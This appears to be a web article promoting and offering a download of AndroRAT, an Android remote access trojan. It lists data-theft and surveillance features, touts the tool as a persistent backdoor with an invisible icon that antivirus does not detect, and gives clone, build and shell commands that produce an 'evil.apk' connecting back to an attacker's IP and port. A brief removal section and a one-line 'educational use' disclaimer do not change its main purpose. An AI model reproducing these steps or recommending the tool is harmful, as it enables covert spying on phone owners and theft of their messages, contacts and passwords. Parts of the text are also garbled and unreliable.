AndroRAT also known as AndroRAT Binder is an open-source app that was developed back in 2012. It is a remote access tool for phones and allows a person to remotely access their Android device. AndroRAT APK free download in its latest version carries a user-friendly control panel which makes it quite easy to control the end-user. It is able to control the device simply by:
- Making phone calls.
- Sending text messages.
- Getting GPS coordinates.
- Accessing stored files on handsets.
- Activating and using the camera and microphone.
At first, it was created as a proof of concept but it has become more evolved in the past few years. This was designed in a team of 4 for a university project. It was realized in one month. The goal is to give control of the system remotely and get pieces of information from it. It has also been in the news because of its popularity and ease of use.
Table of Contents
- 1 What is AndroRAT and AndroRAT Binder?
- 2 How to Install and Use AndroRAT App (Guide)
- 3 AndroRAT Modes Available
- 4 How can AndroRAT be uninstalled/removed from a device
- 5 Download AndroRAT APK for Android v1.3 (2021 Latest)
What is AndroRAT and AndroRAT Binder?
The new carry advanced privileges on any device that unpatched remote execution vulnerability CVE-2015-1805 and inject root exploits.
It is able to exploit the critical vulnerabilities of the targeting platform.
Besides Android, it is also able to target platforms of Windows and iPhone. It shall communicate with the command and server which is controlled by the attacker and perform different commands to steal sensitive information of the user.
Now some of the commands are used to steal:
- Contact list.
- GPS location.
- Messages from the inbox.
- Wifi passwords.
- Upload files to your device.
- Record audio.
- Capture the screen.
AndroRAT APK New Features:
- It is a fully persistent backdoor.
- It is undetectable by an anti-virus scanner.
- It carries an invisible icon on install.
- Light in weight app which runs in the background 24/7.
- Upon boot, the application starts automatically.
- It is able to record audio, video, take pictures from both cameras.
- With this browse all logs including SMS.
- Users can get the current location, sim card details, IP, mac address of the device.
- The app is a client for the server which gets all the connections.
- It runs as a service that starts during the boot. The user needs to interact with the service (though there is a debug activity that allows configuring of IP and a port to connect to.
- Connection to the server can be triggered by an SMS or even a call (this can be configured).
AndroRAT Binder Features:
- Get contacts (and all their pieces of information).
- Get call logs.
- Get all messages.
- Location by GPS/Network.
- Monitoring received messages.
- Monitoring phone state in life (call received, call sent, call missed..)
- Take a picture of the camera.
- Stream sound from the microphone (or other sources..)
- Streaming video (for activity based client only)
- Do toast.
- Send a text message.
- Give call.
- Open an URL in the default browser.
- Do vibrate the phone
Here all clients who are connected appear. The list is updated when a new client connects or disconnects. It logs all connections and global information shown in the panel at the bottom of the windows.
In here all connections with the client window can be made which are articulated around the tabs. The default tab is known as Home and provides different functions. Quick actions like toast a message, vibrate phone or open a URL can be performed.
These other two tabs shown below are for two functions which to get contacts and Geolocation respectively.
How to Install and Use AndroRAT App (Guide)
It requires Python (> 3.6) and JAVA 8 (or Android Studio).
git clone https://github.com/karma9874/AndroRAT.git
pip install colorama
By using Git bash on windows while cloning you might get the following error:
Unable to create file <filename>: Filename too long
This is due to the fact that it has a limit of 4096 characters for a filename, except on widows when it is compiled with msys. It uses an old version of Windows API and carries a limit of 260 characters for a file name.
Users can circumvent this setting core.longpaths to true. Make sure to have the correct administrative privileges.
AndroRAT Modes Available
- –build – To build APK.
- –shell – To get an attractive shell of the device.
-i, --ip -p, --port -o, --output
Users can also build the app manually by importing the Code folder towards the android system and changing the IP address as well as the port number in Congif.java file and then generate the signed APK from Android Studio > Build > Generate Signed APK(s).
After running the shell mode you will get an interpreter of the device:
AndroRAT Commands You Need to Know: takepic [cameraID] startVideo [cameraID] stopVideo startAudio stopAudio getSMS [inbox|sent] getCallLogs shell vibrate [number_of_times] getLocation getIP getSimDetails clear getClipData getMACAddress exit
- If you want to build the APK:
python androRAT.py –build -i 172.174.x.x -p 9000 -o evil.apk
- If you to get the interpreter:
python androRAT.py –shell -i 220.127.116.11 -p 9000
- If you want to generate an APK:
- Some interpreter commands:
- Set up multi-client.
- Add the screenshot command.
How can AndroRAT be uninstalled/removed from a device
I talk about security then android is much safe to use than its Windows counterpart, but by no means it is impenetrable. You need to careful when you download various applications as a large number of positive reviews is not always an indication that is app is safe and secure. To prevent this and other types of malware to infect your phone it is crucial to have an anti-virus installed as basic protection. Moreover, keep your device up to date with the latest update important for its security.
Many anti-virus apps are able to detect this as it is one of the well-known tools.
If you are using the Zemana Mobile Anti-virus premium version which comes with a free trial of 15 days then it shall provide users by blocking hacker’s attempts to do so. This keeps your device secured.
Try this out if you are looking for a solution that shall help detect and remove this.
- In the first step, you need to download this.
- Once done, click on the “Full Scan” button.
- Now you need to wait for the scanning to finish.
Caution: If at any point you want to cancel it out, simply press on the “Abort Scan” button there in the footer.
- It shall then notify you regarding any threats that have been detected so you can remove them.
This is a simple tool that uses sockets. It uses Java on the user side and python on the server side.
It works on devices from Android 4.1 (Jelly Bean) to 9.0 (Oreo) (API 16 to API 28). It also works on 10 (Q) but few interpreter commands shall be unstable.
READ: Please use this in a controlled environment where you may have permission to use such tools. Mainly use it with the intent for educational and informational purposes. An alternative method has also been added.
Download AndroRAT APK for Android v1.3 (2021 Latest)
Without a second thought having remote access as a backup option is always very useful. AndroRAT APK download for Android is one of the most advanced, open-source RAT apps that allows you access to your device from a remote location. This was taken from its official website (Github) where the source code is hosted, enjoy it!
It comes included with:
- Docs: This shall soon contain all the documentation regarding the project.
- Experiments: This carries an experimental version of the client articulated around an activity wish allow by the way to stream video.
- src/Androrat: This carries the source code of the client that should be put on the platform.
- src/AndroratServer: This one carries the sources of the Java or Swing server that can be run on any platform.
- src/API: This carries all the various API’s used in the project (JMapViewer for the map, forms for swing, and vlc for video streaming)
- src/InOut: This carries the code of the content that is common for the client and the server which is generally the protocol implementation.